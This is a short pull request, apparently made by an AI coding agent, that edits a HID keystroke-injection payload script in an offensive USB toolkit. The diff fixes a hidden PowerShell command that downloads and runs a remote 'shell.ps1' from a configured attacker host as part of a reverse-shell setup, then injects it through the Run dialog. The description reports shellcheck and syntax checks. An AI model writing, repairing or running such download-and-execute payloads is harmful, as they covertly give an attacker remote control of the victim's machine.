### PR TITLE
Use HOST variable in Powershell URL

### DIFF
--- a/payloads/hid/autorun_powershell.sh
+++ b/payloads/hid/autorun_powershell.sh
@@ -9,7 +9,8 @@ CONFIG="/opt/p4wnp1-o2/config/reverse_shell.conf"
 HOST="${RS_HOST}"
 SCRIPT="shell.ps1"
 
-CMD="powershell -WindowStyle hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/$SCRIPT')"
+# Use the resolved HOST variable for the download URL
+CMD="powershell -WindowStyle hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://$HOST/$SCRIPT')"
 ESCAPED=$(echo "$CMD" | sed 's/"/\\"/g')
 
 /opt/p4wnp1/tools/hid_injector inject "GUI r"


### PR DESCRIPTION
## Summary
- fix autorun Powershell payload to use HOST variable

## Testing
- `shellcheck payloads/hid/autorun_powershell.sh`
- `bash -n payloads/hid/autorun_powershell.sh`


------
https://chatgpt.com/codex/tasks/task_e_687e13767b48833180c71b45d0fbe88f